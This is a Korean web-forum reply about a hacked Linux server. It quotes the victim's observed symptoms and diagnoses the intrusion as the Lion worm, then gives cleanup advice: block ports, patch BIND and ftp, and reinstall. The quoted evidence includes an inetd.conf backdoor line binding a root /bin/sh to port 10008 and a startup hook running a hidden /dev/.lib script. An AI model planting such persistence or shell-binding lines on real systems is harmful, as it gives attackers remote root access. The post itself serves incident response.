>> Edit article
이름
제목
패스워드
: [현상5] : /etc/rc.d/rc.sysinit화일내 마지막 라인에 : "/dev/.lib/star.sh"추가 되어있다. : : /dev/.lib 디렉토리에는 : [ohsj@oh .lib]$ ls : asp62* bindx.sh* index.html scan.sh* : bind* hack.sh* pscan* star.sh* : bindname.log index.htm randb : [ohsj@oh .lib]$ : 이러한 화일들이 있으며 hacking과 관련된 화일로 보여진다. : : [현상6] : /etc/rc.d/rc5.d디렉토리의 모든 화일들이 갱신되었으며 : -rwxr-xr-x 1 root root 392 Apr 26 22:49 S80rpcmap* : 위와 같은 화일도 있음. : 모든 링크된 화일은 깨져있는지 화면상 깜박거림. : : [현상7] : /etc/inetd.conf 화일내용이 변경된것 같음 : : # : # Authentication : # : auth stream tcp nowait nobody /usr/sbin/in.identd : in.identd -l -e - : o : # : # End of inetd.conf : : linuxconf stream tcp wait root /bin/linuxconf linuxconf --http : #swat stream tcp nowait.400 root /usr/sbin/swat swat : : linuxconf stream tcp wait root /bin/linuxconf linuxconf --http : : linuxconf stream tcp wait root /bin/linuxconf linuxconf --http : #swat stream tcp nowait.400 root /usr/sbin/swat swat : #swat stream tcp nowait.400 root /usr/sbin/swat swat : 10008 stream tcp nowait root /bin/sh sh : asp stream tcp nowait root /sbin/asp : : 위와 같은 현상들이 있읍니다. ------------------------------------------------------------------- 위와 같은 흔적이 있다니 아무래도 요즘 유행하는 인터넷 웜에 당하신거 같군요... 라멘이나 라이온 웜 같은경우 위와 같은 흔적이 남더라군요... 근데... bind* 같은게 있는거 보니까... 아무래도 네임서버의 취약점을 이용한 라이온 웜 같군요... 저도 예전에 라면웜에 당한적이 있는데... 라면웜의 경우 홈페이지만 조금 망친거 외에는 별다른 이상이 없어서... 위의 파일들을 지우고나서 홈페이지만 복구후 사용했었습니다. 그렇지만... 역시 해킹당한 이후에는 자꾸만 이상한 에러들이 발생해서 결국 시스템을 새로 깔아 버렸습니다.. -_-;; 일단 제 생각에는 그런거 같군요... 그러니 일단 바로 2차 해킹이나 백도어를 이용한 크래킹이 들어 오지는 않을거라 생각합니다... 그러니 당장 급한대로는 서버를 이용하는데 큰 지장은 없으리라 생각됩니다만... (웜의 특성상 특정 대상을 공격하는 것이 아니라서...) 백도어가 확실히 있으므로 일단 포트 웬만한건 다 막아 버리시고, (특히 10008, asp 에 열려있는 포트는 ... 이 포트가 웜이 생성한 포트... ) telnet, ftp, mail 모두 외부 접속을 막아 버리시고, ./lib 디렉토리를 이름을 바꿔 버리시구.. bind, ftp를 패치 하시고, 기타 훼손된 자료들을 복구하시면, 대충 임시로를 사용하신다 해도 별 무리는 없을 겁니다만... 오래두시면 틀림없이 누군가 침입합니다... -_-;; 제 서버에도 몇번의 재 침입 시도가 있었고, 제가 모르게 아이디로 슬쩍 만들었더군요... 역시 일단 해킹 당하면, 아예 시스템을 새로 설치하는것이 좋을듯 합니다... 모든 백도어를 찾기는 거의 불가능할듯 한데다... 실제도 백도어가 없다고 해도, 역시 계속 찜찜한 느낌이 들거둔요... -_-;;
Copyleft
1999-2026 by
JSBoard Open Project
Theme Designed by
IDOO
All right reserved